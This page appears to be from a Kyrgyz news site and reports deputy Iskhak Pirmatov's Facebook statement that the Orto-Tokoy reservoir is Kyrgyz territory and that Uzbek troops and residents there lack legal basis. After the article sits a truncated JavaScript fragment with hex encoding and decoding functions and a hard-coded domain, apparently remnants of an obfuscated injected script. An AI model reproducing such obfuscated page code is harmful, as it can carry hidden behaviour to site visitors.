Menu

Исхак Пирматов, ЖК депутаты: “Эл аралык келишим алкагында суу сактагыч Кыргызстандыкы!”

Бөлүшүү:

Урматтуу мекендештер! Орустун жакшы сөзү бар: “не было бы счастья, да несчастье помогло”. Аны сыңарындай бизде дагы 25 жылдан бери Орто-Токой суу сактагычынын маселеси чечилбей келип, акыркы опурталдуу кырдаалга байланыштуу коомчулуктун жана өкмөттүн көңүлүнүн борборуна алынып жатат. Мен мурунку чакырылштагы парламентте буга чейинки премьер министрлерге, вице-премьерлерге , эл аралык комиссиянын мүчөлөрүнө бир топ жолу маселени көтөрүп, эмне себептен ушул күнгө чейин чек арадан 14 км ичкериде жайгашкан суу сактагычта өзбек аскерлери турат? Көлдүн боюнда 44 кожолук, 100 дөн ашуун Өзбекстандын жарандары эч кандай салык төлөбөстөн жашап жүрөт? Чек арадан смена менен келип иштегендерди жана өзбек аскерлеринин сменасы алмашканда биздин милиция кызматкерлери коштоп жүргөнүн качан токтотот?- деген суроолорду ар түрдүү деңгээлде көтөрүп келгем.

Мен өзүм дал ошол суу сактагычтын боюндагы Орто-Токой айылынын уландысы болгон Жой-Белент айылынан болгонум үчүн бул маселени терең изилдеп, тактагам. Өткөн кылымдын 60- жылдары Кыргыз ССРи бул 86га жерди 20 жылдык убакытка Өзбек ССРине ижарага берген. Союз тараганда эле бул суу сактагычты эксплуатациялоо, КМШ мамлекеттеринин ортосундагы Келишимге ылайык Кыргызстан өз колуна алышы керек болчу. Бирок ар түрдүү себептер менен , анын ичинде ошол кездеги жетекчилердин бир күндүк жашоо саясатынан алам ушул күнгө чейин маселе чечилбей келди. Ала-Бука районунун жашоочулары дайыма бул проблеманы коюп келишкен. Орто-Токой суу сактагычы боюнча бүгүнкү Өкмөттүн позициясы жарыялангандай болсо, бул туура. Баарыбыз: эл дагы, жалпы журт дагы, бийлик дагы, оппозиция дагы позициясы бирөө болуш керек. Эл аралык келишим алкагында суу сактагыч Кыргызстандыкы! Ал жерде башка мамлекеттин куралдуу күчтөрүнүн жана жарандарынын турушу эч бир мыйзамга туура келбегени талашсыз! Ал эми сууну колдонууну мурункудай эле эки мамлекеттин эли цивилизациялык ыкмалардын негизинде келишим менен уланта берсе болот. Эң негизгиси биз провокацияга алдырбай, биримдикте, сабырдуулук менен дипломатиялык болгон аракетибизди болушунча колдонуп , дагы эртеңки күнгө калтырып койбостон бул маселелерди чечүүбүз керек!

Мындай пикирин ЖК нын депутаты Исхак Пирматов Facebook баракчасына жазып калтырган.

// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[Ss]{1,2}/g);for(var t=””,o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "kyrgyztoday.kg"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e

Эгер бул тексттен ката таап калсаңыз, ошол ката сөздү белгилеп, Ctrl+Enter кнопкаларын чоогу басуу менен билдирип коюңуз.

КОММЕНТАРИЙ КАЛТЫРУУ

Төмөндө көрсөтүлгөн уячаларга керектүү маалыматтарды туура киргизгениңизди текшериңиз.HTML-код киргизүүгө уруксат жок.

Captcha 13 + = 23

ОКШОШ МАКАЛАЛАР

Меню

Орфографиялык ката тууралуу Отчет

Редакцияга төмөнкү текст жөнөтүлөт: